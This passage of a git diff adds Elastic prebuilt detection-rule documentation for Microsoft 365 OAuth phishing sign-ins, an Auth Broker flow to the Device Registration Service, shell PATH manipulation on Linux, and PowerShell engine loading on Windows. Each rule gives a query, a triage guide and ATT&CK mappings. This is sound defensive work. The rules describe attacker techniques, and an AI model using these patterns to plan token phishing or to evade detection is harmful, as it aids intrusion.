Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Application Access Token +** ID: T1550.001 +** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +* Technique: +** Name: Impersonation +** ID: T1656 +** Reference URL: https://attack.mitre.org/techniques/T1656/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc new file mode 100644 index 0000000000..abdeb19bc9 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-microsoft-365-userloggedin-via-oauth-code.asciidoc @@ -0,0 +1,183 @@ +[[prebuilt-rule-8-19-8-suspicious-microsoft-365-userloggedin-via-oauth-code]] +=== Suspicious Microsoft 365 UserLoggedIn via OAuth Code + +Identifies sign-ins on behalf of a principal user to the Microsoft Graph API from multiple IPs using the Microsoft Authentication Broker or Visual Studio Code application. This behavior may indicate an adversary using a phished OAuth refresh token. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 59m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ +* https://github.com/dirkjanm/ROADtools +* https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/ + +*Tags*: + +* Domain: Cloud +* Domain: Email +* Domain: Identity +* Data Source: Microsoft 365 +* Data Source: Microsoft 365 Audit Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Resources: Investigation Guide +* Tactic: Defense Evasion + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious Microsoft 365 UserLoggedIn via OAuth Code* + + + +*Possible Investigation Steps:* + + +- `o365.audit.UserId`: The identity value the application is acting on behalf of principal user. +- `unique_ips`: Analyze the list of unique IP addresses used within the 30-minute window. Determine whether these originate from different geographic regions, cloud providers, or anonymizing infrastructure (e.g., Tor or VPNs). +- `target_time_window`: Use the truncated time window to pivot into raw events to reconstruct the full sequence of resource access events, including exact timestamps and service targets. +- `azure.auditlogs` to check for device join or registration events around the same timeframe. +- `azure.identityprotection` to identify correlated risk detections, such as anonymized IP access or token replay. +- Any additional sign-ins from the `ips` involved, even outside the broker, to determine if tokens have been reused elsewhere. + + +*False Positive Analysis* + + +- Developers or IT administrators working across environments may also produce similar behavior. + + +*Response and Remediation* + + +- If confirmed unauthorized, revoke all refresh tokens for the affected user and remove any devices registered during this session. +- Notify the user and determine whether the device join or authentication activity was expected. +- Audit Conditional Access and broker permissions (`29d9ed98-a469-4536-ade2-f981bc1d605e`) to ensure policies enforce strict access controls. +- Consider blocking token-based reauthentication to Microsoft Graph and DRS from suspicious locations or user agents. +- Continue monitoring for follow-on activity like lateral movement or privilege escalation. + + +==== Setup + + + +*Setup* + + +The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-o365.audit-* +| where + event.dataset == "o365.audit" and + event.action == "UserLoggedIn" and + source.ip is not null and + o365.audit.UserId is not null and + o365.audit.ApplicationId is not null and + o365.audit.UserType in ("0", "2", "3", "10") and + o365.audit.ApplicationId in ("aebc6443-996d-45c2-90f0-388ff96faa56", "29d9ed98-a469-4536-ade2-f981bc1d605e") and + o365.audit.ObjectId in ("00000003-0000-0000-c000-000000000000") +| eval + Esql.time_window_date_trunc = date_trunc(30 minutes, @timestamp), + Esql.oauth_authorize_user_id_case = case( + o365.audit.ExtendedProperties.RequestType == "OAuth2:Authorize" and o365.audit.ExtendedProperties.ResultStatusDetail == "Redirect", + o365.audit.UserId, + null + ), + Esql.oauth_token_user_id_case = case( + o365.audit.ExtendedProperties.RequestType == "OAuth2:Token", + o365.audit.UserId, + null + ) +| stats + Esql.source_ip_count_distinct = count_distinct(source.ip), + Esql.source_ip_values = values(source.ip), + Esql.o365_audit_ApplicationId_values = values(o365.audit.ApplicationId), + Esql.source_as_organization_name_values = values(source.`as`.organization.name), + Esql.oauth_token_count_distinct = count_distinct(Esql.oauth_token_user_id_case), + Esql.oauth_authorize_count_distinct = count_distinct(Esql.oauth_authorize_user_id_case) + by + o365.audit.UserId, + Esql.time_window_date_trunc, + o365.audit.ApplicationId, + o365.audit.ObjectId +| keep + Esql.time_window_date_trunc, + Esql.source_ip_values, + Esql.source_ip_count_distinct, + Esql.o365_audit_ApplicationId_values, + Esql.source_as_organization_name_values, + Esql.oauth_token_count_distinct, + Esql.oauth_authorize_count_distinct +| where + Esql.source_ip_count_distinct >= 2 and + Esql.oauth_token_count_distinct > 0 and + Esql.oauth_authorize_count_distinct > 0 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Use Alternate Authentication Material +** ID: T1550 +** Reference URL: https://attack.mitre.org/techniques/T1550/ +* Sub-technique: +** Name: Application Access Token +** ID: T1550.001 +** Reference URL: https://attack.mitre.org/techniques/T1550/001/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc new file mode 100644 index 0000000000..6117c668ca --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-microsoft-oauth-flow-via-auth-broker-to-drs.asciidoc @@ -0,0 +1,243 @@ +[[prebuilt-rule-8-19-8-suspicious-microsoft-oauth-flow-via-auth-broker-to-drs]] +=== Suspicious Microsoft OAuth Flow via Auth Broker to DRS + +Identifies separate OAuth authorization flows in Microsoft Entra ID where the same user principal and session ID are observed across multiple IP addresses within a 5-minute window. These flows involve the Microsoft Authentication Broker (MAB) as the client application and the Device Registration Service (DRS) as the target resource. This pattern is highly indicative of OAuth phishing activity, where an adversary crafts a legitimate Microsoft login URL to trick a user into completing authentication and sharing the resulting authorization code, which is then exchanged for an access and refresh token by the attacker. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 60m + +*Searches indices from*: now-61m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/ +* https://github.com/dirkjanm/ROADtools +* https://dirkjanm.io/phishing-for-microsoft-entra-primary-refresh-tokens/ + +*Tags*: + +* Domain: Cloud +* Domain: Identity +* Data Source: Azure +* Data Source: Entra ID +* Data Source: Entra ID Sign-in Logs +* Use Case: Identity and Access Audit +* Use Case: Threat Detection +* Resources: Investigation Guide +* Tactic: Initial Access + +*Version*: 4 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious Microsoft OAuth Flow via Auth Broker to DRS* + + +This rule identifies potential OAuth phishing behavior in Microsoft Entra ID where two OAuth authorization flows are observed in quick succession, sharing the same user principal and session ID but originating from different IP addresses. The client application is the Microsoft Authentication Broker, and the target resource is the Device Registration Service (DRS). This pattern is indicative of adversaries attempting to phish targets for OAuth sessions by tricking users into authenticating through a crafted URL, which then allows the attacker to obtain an authorization code and exchange it for access and refresh tokens. + + +*Possible Investigation Steps:* + + +- `target`: The user principal name targeted by the authentication broker. Investigate whether this user has recently registered a device, signed in from new IPs, or had password resets or MFA changes. +- `session_id`: Used to correlate all events in the OAuth flow. All sign-ins in the alert share the same session, suggesting shared or hijacked state. +- `unique_token_id`: Lists tokens generated in the flow. If multiple IDs exist in the same session, this indicates token issuance from different locations. +- `source_ip`, `city_name`, `country_name`, `region_name`: Review the IPs and geolocations involved. A mismatch in geographic origin within minutes can signal adversary involvement. +- `user_agent`: Conflicting user agents (e.g., `python-requests` and `Chrome`) suggest one leg of the session was scripted or automated. +- `os`: If multiple operating systems are observed in the same short session (e.g., macOS and Windows), this may suggest activity from different environments. +- `incoming_token_type`: Look for values like `"none"` or `"refreshToken"` that can indicate abnormal or re-authenticated activity. +- `token_session_status`: A value of `"unbound"` means the issued token is not tied to a device or CAE session, making it reusable from another IP. +- `conditional_access_status`: If this is `"notApplied"`, it may indicate that expected access policies were not enforced. +- `auth_count`: Number of events in the session. More than one indicates the session was reused within the time window. +- `target_time_window`: Use this to pivot into raw sign-in logs to review the exact sequence and timing of the activity. +- Search `azure.auditlogs` for any device join or registration activity around the `target_time_window`. +- Review `azure.identityprotection` logs for anonymized IPs, impossible travel, or token replay alerts. +- Search for other activity from the same IPs across all users to identify horizontal movement. + + +*False Positive Analysis* + + +- A legitimate device join from a user switching networks (e.g., mobile hotspot to Wi-Fi) could explain multi-IP usage. +- Some identity management agents or EDR tools may use MAB for background device registration flows. +- Developers or IT administrators may access DRS across environments when testing. + + +*Response and Remediation* + + +- If confirmed unauthorized, revoke all refresh tokens for the user and disable any suspicious registered devices. +- Notify the user and verify if the authentication or device join was expected. +- Review Conditional Access policies for the Microsoft Authentication Broker (`29d9ed98-a469-4536-ade2-f981bc1d605e`) to ensure enforcement of MFA and device trust. +- Consider restricting token-based reauthentication from anonymized infrastructure or unusual user agents. +- Continue monitoring for follow-on activity, such as privilege escalation, token misuse, or lateral movement. + + +==== Setup + + + +*Required Microsoft Entra ID Sign-In Logs* + +This rule requires the Microsoft Entra ID Sign-In Logs integration be enabled and configured to collect sign-in logs. In Entra ID, sign-in logs must be enabled and streaming to the Event Hub used for the Azure integration. + + +==== Rule query + + +[source, js] +---------------------------------- +from logs-azure.signinlogs-* metadata _id, _version, _index +| where + event.dataset == "azure.signinlogs" and + event.outcome == "success" and + azure.signinlogs.properties.user_type == "Member" and + azure.signinlogs.identity is not null and + azure.signinlogs.properties.user_principal_name is not null and + source.address is not null and + azure.signinlogs.properties.app_id == "29d9ed98-a469-4536-ade2-f981bc1d605e" and // MAB + azure.signinlogs.properties.resource_id == "01cb2876-7ebd-4aa4-9cc9-d28bd4d359a9" // DRS + +| eval + Esql.time_window_date_trunc = date_trunc(30 minutes, @timestamp), + Esql.azure_signinlogs_properties_session_id = azure.signinlogs.properties.session_id, + Esql.is_browser_case = case( + to_lower(azure.signinlogs.properties.device_detail.browser) rlike "(chrome|firefox|edge|safari).*", 1, 0 + ) + +| stats + Esql_priv.azure_signinlogs_properties_user_display_name_values = values(azure.signinlogs.properties.user_display_name), + Esql_priv.azure_signinlogs_properties_user_principal_name_values = values(azure.signinlogs.properties.user_principal_name), + Esql.azure_signinlogs_properties_session_id_values = values(azure.signinlogs.properties.session_id), + Esql.azure_signinlogs_properties_unique_token_identifier_values = values(azure.signinlogs.properties.unique_token_identifier), + + Esql.source_geo_city_name_values = values(source.geo.city_name), + Esql.source_geo_country_name_values = values(source.geo.country_name), + Esql.source_geo_region_name_values = values(source.geo.region_name), + Esql.source_address_values = values(source.address), + Esql.source_address_count_distinct = count_distinct(source.address), + Esql.source_as_organization_name_values = values(source.`as`.organization.name), + + Esql.azure_signinlogs_properties_authentication_protocol_values = values(azure.signinlogs.properties.authentication_protocol), + Esql.azure_signinlogs_properties_authentication_requirement_values = values(azure.signinlogs.properties.authentication_requirement), + Esql.azure_signinlogs_properties_is_interactive_values = values(azure.signinlogs.properties.is_interactive), + + Esql.azure_signinlogs_properties_incoming_token_type_values = values(azure.signinlogs.properties.incoming_token_type), + Esql.azure_signinlogs_properties_token_protection_status_details_sign_in_session_status_values = values(azure.signinlogs.properties.token_protection_status_details.sign_in_session_status), + Esql.azure_signinlogs_properties_session_id_count_distinct = count_distinct(azure.signinlogs.properties.session_id), + Esql.azure_signinlogs_properties_app_display_name_values = values(azure.signinlogs.properties.app_display_name), + Esql.azure_signinlogs_properties_app_id_values = values(azure.signinlogs.properties.app_id), + Esql.azure_signinlogs_properties_resource_id_values = values(azure.signinlogs.properties.resource_id), + Esql.azure_signinlogs_properties_resource_display_name_values = values(azure.signinlogs.properties.resource_display_name), + + Esql.azure_signinlogs_properties_app_owner_tenant_id_values = values(azure.signinlogs.properties.app_owner_tenant_id), + Esql.azure_signinlogs_properties_resource_owner_tenant_id_values = values(azure.signinlogs.properties.resource_owner_tenant_id), + + Esql.azure_signinlogs_properties_conditional_access_status_values = values(azure.signinlogs.properties.conditional_access_status), + Esql.azure_signinlogs_properties_risk_state_values = values(azure.signinlogs.properties.risk_state), + Esql.azure_signinlogs_properties_risk_level_aggregated_values = values(azure.signinlogs.properties.risk_level_aggregated), + + Esql.azure_signinlogs_properties_device_detail_browser_values = values(azure.signinlogs.properties.device_detail.browser), + Esql.azure_signinlogs_properties_device_detail_operating_system_values = values(azure.signinlogs.properties.device_detail.operating_system), + Esql.user_agent_original_values = values(user_agent.original), + Esql.is_browser_case_max = max(Esql.is_browser_case), + + Esql.event_count = count(*) + by + Esql.time_window_date_trunc, + azure.signinlogs.properties.user_principal_name, + azure.signinlogs.properties.session_id + +| keep + Esql.time_window_date_trunc, + Esql_priv.azure_signinlogs_properties_user_display_name_values, + Esql_priv.azure_signinlogs_properties_user_principal_name_values, + Esql.azure_signinlogs_properties_session_id_values, + Esql.azure_signinlogs_properties_unique_token_identifier_values, + Esql.source_geo_city_name_values, + Esql.source_geo_country_name_values, + Esql.source_geo_region_name_values, + Esql.source_address_values, + Esql.source_address_count_distinct, + Esql.source_as_organization_name_values, + Esql.azure_signinlogs_properties_authentication_protocol_values, + Esql.azure_signinlogs_properties_authentication_requirement_values, + Esql.azure_signinlogs_properties_is_interactive_values, + Esql.azure_signinlogs_properties_incoming_token_type_values, + Esql.azure_signinlogs_properties_token_protection_status_details_sign_in_session_status_values, + Esql.azure_signinlogs_properties_session_id_count_distinct, + Esql.azure_signinlogs_properties_app_display_name_values, + Esql.azure_signinlogs_properties_app_id_values, + Esql.azure_signinlogs_properties_resource_id_values, + Esql.azure_signinlogs_properties_resource_display_name_values, + Esql.azure_signinlogs_properties_app_owner_tenant_id_values, + Esql.azure_signinlogs_properties_resource_owner_tenant_id_values, + Esql.azure_signinlogs_properties_conditional_access_status_values, + Esql.azure_signinlogs_properties_risk_state_values, + Esql.azure_signinlogs_properties_risk_level_aggregated_values, + Esql.azure_signinlogs_properties_device_detail_browser_values, + Esql.azure_signinlogs_properties_device_detail_operating_system_values, + Esql.user_agent_original_values, + Esql.is_browser_case_max, + Esql.event_count + +| where + Esql.source_address_count_distinct >= 2 and + Esql.azure_signinlogs_properties_session_id_count_distinct == 1 and + Esql.is_browser_case_max >= 1 and + Esql.event_count >= 2 + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Cloud Accounts +** ID: T1078.004 +** Reference URL: https://attack.mitre.org/techniques/T1078/004/ +* Technique: +** Name: Phishing +** ID: T1566 +** Reference URL: https://attack.mitre.org/techniques/T1566/ +* Sub-technique: +** Name: Spearphishing Link +** ID: T1566.002 +** Reference URL: https://attack.mitre.org/techniques/T1566/002/ +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: Steal Application Access Token +** ID: T1528 +** Reference URL: https://attack.mitre.org/techniques/T1528/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-path-invocation-from-command-line.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-path-invocation-from-command-line.asciidoc new file mode 100644 index 0000000000..0dffa42f3a --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-path-invocation-from-command-line.asciidoc @@ -0,0 +1,171 @@ +[[prebuilt-rule-8-19-8-suspicious-path-invocation-from-command-line]] +=== Suspicious Path Invocation from Command Line + +This rule detects the execution of a PATH variable in a command line invocation by a shell process. This behavior is unusual and may indicate an attempt to execute a command from a non-standard location. This technique may be used to evade detection or perform unauthorized actions on the system. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://blog.exatrack.com/Perfctl-using-portainer-and-new-persistences/ + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating Suspicious Path Invocation from Command Line* + + +In Linux environments, shell processes like bash or zsh execute commands, often using the PATH variable to locate executables. Adversaries may manipulate PATH to run malicious scripts from non-standard directories, evading detection. The detection rule identifies unusual PATH assignments in command lines, signaling potential unauthorized actions by monitoring specific shell invocations and command patterns. + + +*Possible investigation steps* + + +- Review the command line details captured in the alert to identify the specific PATH assignment and the command being executed. This can provide insight into whether the command is expected or potentially malicious. +- Check the process tree to understand the parent process and any child processes spawned by the suspicious shell invocation. This can help determine the context in which the command was executed. +- Investigate the user account associated with the process to determine if the activity aligns with the user's typical behavior or if the account may have been compromised. +- Examine the directory from which the command is being executed to verify if it is a non-standard or suspicious location. Look for any unusual files or scripts in that directory. +- Cross-reference the event with other security logs or alerts to identify any correlated activities that might indicate a broader attack or compromise. +- Assess the system's recent changes or updates to determine if they could have inadvertently caused the PATH modification or if it was intentionally altered by an adversary. + + +*False positive analysis* + + +- System administrators or developers may intentionally modify the PATH variable for legitimate purposes, such as testing scripts or applications in development environments. To handle this, create exceptions for known users or specific directories commonly used for development. +- Automated scripts or configuration management tools might alter the PATH variable as part of their normal operation. Identify these scripts and exclude their execution paths or user accounts from triggering alerts. +- Some software installations or updates may temporarily change the PATH variable to include non-standard directories. Monitor installation processes and whitelist these activities when performed by trusted sources. +- Custom shell configurations or user profiles might include PATH modifications for convenience or performance reasons. Review and document these configurations, and exclude them from detection if they are verified as non-threatening. +- Educational or training environments where users experiment with shell commands may frequently trigger this rule. Consider excluding specific user groups or environments dedicated to learning and experimentation. + + +*Response and remediation* + + +- Immediately isolate the affected system from the network to prevent potential lateral movement or data exfiltration. +- Terminate any suspicious processes identified by the alert to stop any ongoing unauthorized actions. +- Review the command history and PATH variable changes on the affected system to identify any unauthorized modifications or scripts executed from non-standard directories. +- Restore the PATH variable to its default state to ensure that only trusted directories are used for command execution. +- Conduct a thorough scan of the system using updated antivirus or endpoint detection tools to identify and remove any malicious scripts or files. +- Escalate the incident to the security operations center (SOC) or incident response team for further analysis and to determine if additional systems are affected. +- Implement monitoring for similar PATH manipulation attempts across the network to enhance detection and prevent recurrence. + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +event.category:process and host.os.type:linux and event.type:start and event.action:exec and +process.name:(bash or csh or dash or fish or ksh or sh or tcsh or zsh) and process.args:-c and +process.command_line:*PATH=* and +not ( + process.command_line:(*_PATH=* or *PYTHONPATH=* or sh*/run/motd.dynamic.new) or + process.parent.executable:( + "/opt/puppetlabs/puppet/bin/puppet" or /var/lib/docker/overlay2/* or /vz/root/*/dovecot or + "/usr/libexec/dovecot/auth" or /home/*/.local/share/containers/* or /vz/root/*/dovecot/auth + ) or + process.parent.command_line:"runc init" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-powershell-engine-imageload.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-powershell-engine-imageload.asciidoc new file mode 100644 index 0000000000..ce8c23d632 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-powershell-engine-imageload.asciidoc @@ -0,0 +1,158 @@ +[[prebuilt-rule-8-19-8-suspicious-powershell-engine-imageload]] +=== Suspicious PowerShell Engine ImageLoad + +Identifies the PowerShell engine being invoked by unexpected processes. Rather than executing PowerShell functionality with powershell.exe, some attackers do this to operate more stealthily. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.library-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/security-labs/elastic-security-labs-steps-through-the-r77-rootkit + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Execution +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 214 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating Suspicious PowerShell Engine ImageLoad* + + +PowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code. + +Attackers can use PowerShell without having to execute `PowerShell.exe` directly. This technique, often called "PowerShell without PowerShell," works by using the underlying System.Management.Automation namespace and can bypass application allowlisting and PowerShell security features. + + +*Possible investigation steps* + + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate abnormal behaviors observed by the subject process, such as network connections, registry or file modifications, and any spawned child processes. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Inspect the host for suspicious or abnormal behavior in the alert timeframe. +- Retrieve the implementation (DLL, executable, etc.) and determine if it is malicious: + - Use a private sandboxed malware analysis system to perform analysis. + - Observe and collect information about the following activities: + - Attempts to contact external domains and addresses. + - File and registry access, modification, and creation activities. + - Service creation and launch activities. + - Scheduled task creation. + - Use the PowerShell `Get-FileHash` cmdlet to get the files' SHA-256 hash values. + - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. + + +*False positive analysis* + + +- This activity can happen legitimately. Some vendors have their own PowerShell implementations that are shipped with some products. These benign true positives (B-TPs) can be added as exceptions if necessary after analysis. + + +*Response and remediation* + + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:windows and event.category:library and + dll.name:("System.Management.Automation.dll" or "System.Management.Automation.ni.dll") and + not ( + process.code_signature.subject_name:( + "Microsoft Corporation" or + "Microsoft Dynamic Code Publisher" or + "Microsoft Windows" + ) and process.code_signature.trusted:true and not process.name.caseless:"regsvr32.exe" + ) and + not ( + process.executable:(C\:\\Program*Files*\(x86\)\\*.exe or C\:\\Program*Files\\*.exe) and + process.code_signature.trusted:true + ) and + not ( + process.executable: C\:\\Windows\\Lenovo\\*.exe and process.code_signature.subject_name:"Lenovo" and + process.code_signature.trusted:true + ) and + not ( + process.executable: C\:\\Windows\\AdminArsenal\\PDQInventory-Scanner\\service-*\\exec\\PDQInventoryScanner.exe and + process.code_signature.subject_name:"PDQ.com Corporation" and + process.code_signature.trusted:true + ) and + not ( + process.executable: C\:\\Windows\\Temp\\\{*\}\\_is*.exe and + process.code_signature.subject_name:("Dell Technologies Inc." or "Dell Inc" or "Dell Inc.") and + process.code_signature.trusted:true + ) and + not ( + process.executable: C\:\\ProgramData\\chocolatey\\* and + process.code_signature.subject_name:("Chocolatey Software, Inc." or "Chocolatey Software, Inc") and + process.code_signature.trusted:true + ) and + not process.executable : ( + "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" or + "C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe" + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-seincreasebasepriorityprivilege-use.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-seincreasebasepriorityprivilege-use.asciidoc new file mode 100644 index 0000000000..493293821e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-19-8/prebuilt-rule-8-19-8-suspicious-seincreasebasepriorityprivilege-use.asciidoc @@ -0,0 +1,126 @@ +[[prebuilt-rule-8-19-8-suspicious-seincreasebasepriorityprivilege-use]] +=== Suspicious SeIncreaseBasePriorityPrivilege Use + +Identifies attempts to use the SeIncreaseBasePriorityPrivilege privilege by an unusual process. This could be related to hijack execution flow of a process via threats priority manipulation. + +*Rule type*: query + +*Rule indices*: + +* logs-system.security* +* logs-windows.forwarded* +* winlogbeat-* + +*Severity*: high + 